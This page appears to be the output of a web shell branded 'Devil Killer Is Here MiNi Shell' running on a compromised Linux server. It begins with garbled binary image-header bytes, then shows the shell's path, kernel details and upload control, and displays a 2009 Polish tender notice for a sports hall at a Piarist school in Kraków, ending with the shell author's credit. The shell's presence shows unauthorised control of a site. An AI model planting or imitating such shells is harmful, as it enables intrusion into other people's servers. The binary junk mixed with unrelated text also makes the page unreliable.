JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090123/8538-N-2009.html

<p class="kh_header"><b>Kraków: Przetarg nieograniczony nr ZP/RB/02/2009 na wyłonienie Wykonawcy inwestycji pn. Budowa ogólnodostępnej sali sportowej Calasanz Arena Olsza Sport przy publicznym Gimnazjum Ojców Pijarów w Krakowie.</b><br>
<b>Numer ogłoszenia: 8538 - 2009; data zamieszczenia: 23.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polska Prowincja Zakonu Pijarów , ul. Pijarska 2, 31-015 Kraków, woj. małopolskie, tel. 0-12 422 17 24, faks 0-12 421 98 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pijarzy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Kościoła Katolickiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr ZP/RB/02/2009 na wyłonienie Wykonawcy inwestycji pn. Budowa ogólnodostępnej sali sportowej Calasanz Arena Olsza Sport przy publicznym Gimnazjum Ojców Pijarów w Krakowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja inwestycji pn. Budowa ogólnodostępnej sali sportowej Calasanz Arena Olsza Sport przy publicznym Gimnazjum Ojców Pijarów w Krakowie zlokalizowanej na działkach gruntu pozostających we władaniu Zamawiającego.
Charakterystyczne parametry techniczne Inwestycji:
Powierzchnia zabudowy - 1102,0 m2,
Powierzchnia użytkowa  - 1663,7 m2, 
Powierzchnia całkowita  - 1877,5 m2,
Kubatura budynku         - 10935,0 m3,
Wysokość budynku (najwyższa) od poziomu wejścia do attyki wynosi 15 m..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.25-9, 45.21.42.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wysokość wadium
1.1.	Każdy Wykonawca zobowiązany jest wnieść wadium, na cały okres związania ofertą, w wysokości: 80.000 zł (osiemdziesiąttysięcy złotych) 
1.2	Do oferty Wykonawca może załączyć dokument potwierdzający wniesienie wadium przez Wykonawcę tzn.:
a.	oryginał lub potwierdzoną za zgodność z oryginałem kopię polecenia przelewu na rachunek bankowy Zamawiającego,
b.	kopię dokumentu będącego każdą inną formą wadium dopuszczoną przez Zamawiającego.

UWAGA: W PRZYPADKU PRZEDŁUŻENIA TERMINU ZWIĄZANIA OFERTĄ, WYKONAWCA, KTÓRY WNIESIE NOWE WADIUM NA PRZEDŁUŻONY OKRES, POWINIEN POINFORMOWAĆ O TYM FAKCIE OSOBĘ UPRAWNIONĄ DO KONTAKTÓW Z WYKONAWCAMI W TYM POSTĘPOWANIU. POINFORMOWANIE OZNACZA ZŁOŻENIE KOPII DOWODU WNIESIENIA NOWEGO WADIUM DO SIEDZIBY ZAMAWIAJĄCEGO. W PRZYPADKU NIE ZASTOSOWANIA SIĘ DO POWYŻSZEGO, ZAMAWIAJĄCY NIE PONOSI ODPOWIEDZIALNOŚCI ZA SKUTKI NIEZWRÓCENIA WYKONAWCY ANEKSU GWARANCJI WADIALNYCH BĄDŹ WADIUM.

1.3	Wykonawca zostanie wykluczony z niniejszego postępowania, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona akceptowaną przez Zamawiającego formą wadium w wymaganej wysokości.

2.	Forma wadium.
Wadium może być wniesione w następujących formach:
2.1	pieniądzu;
2.2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2.3	gwarancjach bankowych;
2.4	gwarancjach ubezpieczeniowych;
2.5	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 Nr 42, poz. 275, z późn. zm.).

W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja ma być, co najmniej gwarancją nieodwołalną i płatną na pierwsze pisemne zwykłe żądanie Zamawiającego.

3.	Miejsce i sposób wniesienia wadium.
3.1 Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Pekao S.A. III o/Kraków
Nr 34 1240 2294 1111 0010 1708 2276
Z dopiskiem: Budowa sali sportowej - wadium postępowanie nr ZP/RB/02/2009
3.2 Wadium wnoszone w innej formie niż w pieniądzu należy zdeponować w oryginale w siedzibie Zamawiającego ul. Pijarska 2, 31-015 Kraków (od poniedziałku do piątku w godz. 9:00 - 16:00) w terminie składania ofert.

4.	Termin wniesienia wadium.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 

5.	Zwrot wadium.
5.1	Zamawiający zwróci niezwłocznie wadium, jeżeli: 
a.	upłynął termin związania ofertą,
b.	zawarto umowę w sprawie niniejszego zamówienia i wniesiono zabezpieczenie należytego wykonania tej umowy,
c.	Zamawiający unieważnił postępowanie o udzielenie niniejszego zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wniesienia.

5.2	Na pisemny wniosek Wykonawcy Zamawiający zwraca niezwłocznie wadium, jeżeli:
a.	Wykonawca wycofał swoją ofertę przed upływem terminu składania ofert,
b.	Wykonawca został wykluczony z postępowania,
c.	jego oferta została odrzucona.

5.3	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę. Zaleca się wskazanie w ofercie nr rachunku bankowego, na który należy dokonać zwrotu. 

6.	Utrata wadium.
6.1	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
d.   w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 uPZP, nie złożył dokumentów lub oświadczeń, o których mowa w Rozdziale VI pkt C, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
6.2	Powyższe okoliczności muszą być jednoznacznie określone w treści gwarancji wnoszonej w formie innej niż pieniężna.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> A. 	OPIS WARUNKÓW UDZIAŁU W POSTĘPOWANIU.

O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:

1.	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 Prawa zamówień publicznych.

2.	Posiadają niezbędną wiedzę i doświadczenie w wykonywaniu, jako generalny wykonawca, robot budowlanych w obiektach kubaturowych. Zamawiający wymaga, aby wykonawca należycie wykonał (zakończył), w okresie ostatnich 5 lat przed dniem wszczęcia postępowania, jako generalny wykonawca, roboty budowlane:

a)	o wartości co najmniej 10 (dziesięć) milionów zł netto w jednym budynku lub 

b)	o wartości co najmniej 5 (pięć) milionów zł netto w dwóch budynkach, wartość 5 milionów złotych netto odnosi się osobno do każdego z dwóch budynków; przy czym budynek ten (pkt a) lub budynki (pkt b) winny należeć do niżej wymienionych klas Polskiej Klasyfikacji Obiektów Budowlanych: 1220, 1230, 1241, 1261, 1263, 1265 (Rozporządzenie Rady Ministrów z dnia 30.12.1999r. w sprawie Polskiej Klasyfikacji Obiektów Budowlanych Dz. U. Nr 112 z 1999 r., poz. 1316 z póz. zm.). 

UWAGA! W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż PLN Zamawiający, jako kurs przeliczeniowy waluty, o której mowa w powyższym punkcie, przyjmie średni kurs Narodowego Banku Polskiego (NBP) obowiązujący w dniu opublikowania ogłoszenia w Dzienniku Urzędowym Unii Europejskiej Urzędu Oficjalnych Publikacji Wspólnot Europejskich.
       
3.	Dysponują osobami zdolnymi do wykonania zamówienia.
Zamawiający wymaga, aby wykonawca dysponował, co najmniej niżej wymienionymi osobami oraz aby:
                     
a)	1 osoba przewidziana do pełnienia funkcji kierownika budowy posiadała minimum 5 - letnie doświadczenie w pełnieniu funkcji kierownika budowy, w tym przynajmniej przy realizacji 1 obiektu należącego do klas PKOB wymienionych w pkt VI A 3.b SIWZ oraz posiadała uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno - budowlanej - bez ograniczeń, 
b)	1 osoba przewidziana do pełnienia funkcji kierownika robót w zakresie sieci i instalacji sanitarnych, posiadała minimum 5 - letnie doświadczenie w pełnieniu funkcji kierownika robót w zakresie sieci i instalacji sanitarnych, w tym przynajmniej przy realizacji 1 obiektu należącego do klas PKOB wymienionych w pkt VI A 3.b SIWZ oraz posiadała uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - bez ograniczeń; 
c)	1 osoba przewidziana do pełnienia funkcji kierownika robót wentylacyjnych, posiadała minimum 5 - letnie doświadczenie w pełnieniu funkcji kierownika robót w zakresie wentylacji, w tym przynajmniej przy realizacji 1 obiektu należącego do klas PKOB wymienionych w pkt VI A 3.b SIWZ oraz posiadała uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - bez ograniczeń;  
d)	1 osoba przewidziana do pełnienia funkcji kierownika robót w zakresie instalacji i urządzeń elektrycznych, posiadała minimum 5 - letnie doświadczenie w pełnieniu funkcji kierownika robót w zakresie instalacji i urządzeń elektrycznych, w tym przynajmniej przy realizacji 1 obiektu należącego do klas PKOB wymienionych w pkt VI A 3.b SIWZ oraz posiadała uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń;  
e)	1 osoba przewidziana do pełnienia funkcji kierownika robót w zakresie instalacji niskoprądowych, posiadała minimum 5 - letnie doświadczenie w pełnieniu funkcji kierownika robót w zakresie instalacji niskoprądowych, w tym przynajmniej przy realizacji 1 obiektu należącego do klas PKOB wymienionych w pkt VI A 3.b SIWZ oraz posiadała uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń; 
f)	1 osoba przewidziana do kierowania robotami montażu elektronicznych urządzeń i systemów alarmowych, sygnalizujących zagrożenie chronionych osób i mienia, posiadała licencję pracownika zabezpieczenia technicznego drugiego stopnia wydaną na podstawie art. 29 ust. 1 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz. U. 2005 nr 145 poz. 1221 tj. z późniejszymi zmianami).

UWAGA:
Za spełnienie warunku udziału w postępowaniu przez osoby wymienione w punkcie nr A 4 (z wyjątkiem osoby wymienionej w podpunkcie f) Zamawiający uzna posiadanie przez te osoby uprawnień budowlanych do wykonywania samodzielnych funkcji technicznych w budownictwie - bez ograniczeń (na podstawie Rozporządzenia Ministra Transportu i Budownictwa z dnia 28.04.2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (DZ. U. 2006 nr 83 poz. 578 z późn. zm.), lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do wykonania przedmiotu zamówienia.
Wyżej wymienione osoby muszą być członkami izby samorządu zawodowego inżynierów budownictwa.
Osoby posiadające uprawnienia budowlane wydane na podstawie przepisów obowiązujących po dniu 14.02.1995 r. muszą być wpisane do centralnego rejestru osób posiadających uprawnienia budowlane, prowadzonego przez Głównego Inspektora Nadzoru Budowlanego. 

4. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Zamawiający wymaga, aby wykonawca:
a)	uzyskał w ostatnich trzech latach obrotowych średnie roczne przychody ze sprzedaży produktów (przychody) w wysokości co najmniej 20 (dwadzieścia) milionów PLN,

UWAGA! W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż PLN Zamawiający, jako kurs przeliczeniowy waluty, w której oszacowano warunki finansowo-ekonomiczne,  przyjmie średni kurs Narodowego Banku Polskiego (NBP) obowiązujący na dzień bilansowy.

b)	posiadał środki finansowe lub zdolność kredytową w kwocie co najmniej 10 (dziesięć)  milionów PLN,

UWAGA! W przypadku złożenia przez Wykonawców informacji bankowych w innych walutach niż PLN Zamawiający, jako kurs przeliczeniowy waluty, w której oszacowano warunki finansowo-ekonomiczne przyjmie średni kurs Narodowego Banku Polskiego (NBP) obowiązujący w dniu wydania takiej opinii.


B. 	OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU: 
Ocena spełniania warunków udziału w postępowaniu dokonywana będzie na podstawie dostarczonych przez wykonawcę wraz z ofertą oświadczeń i dokumentów. Spełnianie minimalnych warunków udziału w postępowaniu określonych w punktach 1 do 4 oceniane będzie metodą: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> INFORMACJA O OŚWIADCZENIACH I DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU OPISANYCH W ROZDZIALE II A SIWZ:

1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.	Oświadczenie, o którym mowa w art. 44 PZP o spełnianiu warunków udziału w postępowaniu w zakresie art. 22 ust. 1 pkt 1 - 3 PZP - załącznik nr 7. 

3.	Oświadczenie, o którym mowa w art. 44 PZP o spełnianiu warunków udziału w postępowaniu w zakresie art. 22 ust. 1 pkt 4 PZP - załącznik nr 8.

4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedstawiają dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

5.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

6.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 PZP, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

7.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 PZP (dotyczy podmiotów zbiorowych), wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

8.	Wykaz wykonanych (zakończonych) robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie. - Załącznik nr 6.

9.	Dla osób wyszczególnionych w warunku udziału w postępowaniu opisanym w punkcie A 4 odpowiednio: 
a)	uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie - bez ograniczeń, lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, wystarczające do wykonania przedmiotu zamówienia.
	oraz 
b)	aktualne zaświadczenia potwierdzające przynależność ww. osób do właściwej izby samorządu zawodowego - z określonym terminem ich ważności. 
c)	wypis z centralnego rejestru osób uprawnionych, potwierdzony przez Głównego Inspektora Nadzoru Budowlanego zgodnie z art. 12 ust. 7 ustawy Prawo budowlane Dz.U.06.156.1118 z późn. zm. (dotyczy tylko tych osób, których uprawnienia budowlane zostały wydane na podstawie przepisów, które weszły w życie po dniu 14.02.1995r.)
d)	licencja pracownika zabezpieczenia technicznego, 

10.	Wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - Załącznik nr 4. (UWAGA! Załącznik nr 4 z kolejną numeracją należy wypełnić dla każdej z tych osób).

11.	Sprawozdanie finansowe albo jego część (co najmniej bilans i rachunek zysków i strat) a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, inne dokumenty określające obroty oraz zobowiązania i należności - za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. 

12.	Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Dokumenty wyszczególnione w punktach 1, 5, 6 i 7 składają wszystkie podmioty występujące wspólnie, z tym, że w zakresie oświadczenia, o którym mowa w punkcie 2 wszystkie podmioty występujące wspólnie składają co najmniej oświadczenie o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 PZP.   

Wszystkie wymagane dokumenty należy przedłożyć w oryginale lub wyraźnej kopii poświadczonej za zgodność z oryginałem przez wykonawcę.

Dokumenty wydane w języku obcym należy przedłożyć dodatkowo w tłumaczeniu na język polski, poświadczonym przez wykonawcę.

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wyszczególnionych w punktach 1, 5, 6, 7 składa dokumenty, o których mowa w § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 z późniejszymi zmianami)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pijarzy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polska Prowincja Zakonu Pijarów,
ul. Pijarska 2,
31-015 Kraków..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2009 godzina 10:00, miejsce: Polska Prowincja Zakonu Pijarów,
ul. Pijarska 2,
31-015 Kraków..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com